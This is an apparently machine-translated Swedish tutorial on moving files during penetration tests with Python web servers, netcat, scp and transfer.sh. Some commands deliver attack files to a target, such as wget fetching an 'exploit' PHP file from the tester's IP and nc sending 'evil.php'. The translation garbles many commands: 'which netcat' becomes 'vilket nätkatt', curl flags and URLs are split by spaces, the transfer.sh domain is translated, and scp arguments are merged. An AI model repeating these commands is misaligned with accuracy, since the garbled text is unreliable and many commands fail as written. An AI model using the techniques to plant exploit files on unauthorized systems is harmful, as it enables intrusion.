Överföring av exploater, python-skript och laddningsmoduler behövs ofta under penetrationstestaktiviteter. Eftersom terminalen är det verktyg som används mest är det viktigt att förstå grunderna för filöverföringen.
En pennprover bör vara väl utrustad med olika knep för att överföra filer från en fjärrserver från en katalog till en annan. I denna handledning ska vi diskutera olika sätt att överföra filer med kommandoraden.
1. Python Server
Python är det grundläggande paketet som kommer förinstallerat i nästan alla Debian-baserade system. Gör följande för att överföra en fil från en maskin till en annan;
Python2:
Byt till katalogen där din fil som du vill överföra finns. Starta en enkel pythonserver. Ange följande kommando;
$ python -m SimpleHTTPServer 8080
Gå nu till maskinen där du vill överföra filen. Använd följande kommando för att ladda ner filen;
$ wget http: // 192.168.43.177: 8080 / fil
Kom ihåg att ersätta filens IP, portnummer och namn.
Python3:
Allt som skrivs i python2 kommer nästan alltid att brytas i python3. Så vi tittar också på hur man överför en fil med python3.
När det gäller python3 anger du följande kommando för att starta en enkel pythonserver.
$ python3 -m http.server 8080
För att ladda ner filen på målet, ange följande kommando;
$ wget http: // 192.168.43.177: 8080 / utnyttja.php
2. Netcat
Netcat är ett kraftfullt verktyg för att överföra filer från valfri fjärrmaskin till en lokal maskin. Det kanske inte alltid är installerat. Du kan kontrollera om det finns eller inte genom att skriva in;
$ vilket nätkatt
Alternativt genom att gå in;$ vilken nc
Skapa en netcat-server med följande kommando;
$ nc -nlvp 8080 < evil.php
Gå nu till målmaskinen och ange följande för att ladda ner filen;
$ nc -nv 192.168.43.177 8080> ondska.php
Byta ut nc
med netcat
i ovanstående kommandon om nc inte fungerar eller inte är korrekt installerad.
3. SCP
Secure Copy Protocol är ett kraftfullt verktyg för överföring av filer. Det kommer till nytta speciellt när du vill överföra kataloger. Det används också mest för filöverföringar över ssh.
För överföring av fil via ssh, ange följande kommando på den sändande maskinen;
$ scp -i nytt.pem-test.py ubuntu @ 18.220.68.229: / home / ubuntu
Där -i representerar den offentliga nyckeln för ssh-inloggning, testa.py är filen som ska överföras och / home / ubuntu är målkatalogen där vi vill spara filen.
För att ladda ner en fil från fjärrmaskinen, ange följande kommando;
$ scp root @ 192.168.43.177: / remote_directory / file / local / katalog
4. Överföra.sh
Du kan använda detta tredjepartsverktyg för att överföra filer. Det kan vara användbart när du inte har en maskin med offentlig IP och du fortfarande måste överföra filerna. Följande kommando laddar upp filen till överföringen.sh-servrar;
$ curl - uppladdningsfil ./fil.txt https: // överföring.sh / fil.Text
För att ladda ner filen, ange följande kommando;
$ curl https: // överföring.sh // fil.txt -o-fil.Text
Överföra.sh är fortfarande under utveckling och kanske inte alltid fungerar.
Slutsats
Kommandoradsverktyg ger oss möjlighet att överföra filer på olika sätt. De kan verka lite komplicerade men att få praktisk information ger dem möjlighet att enkelt hantera filer, särskilt när ett GUI-alternativ inte är tillgängligt.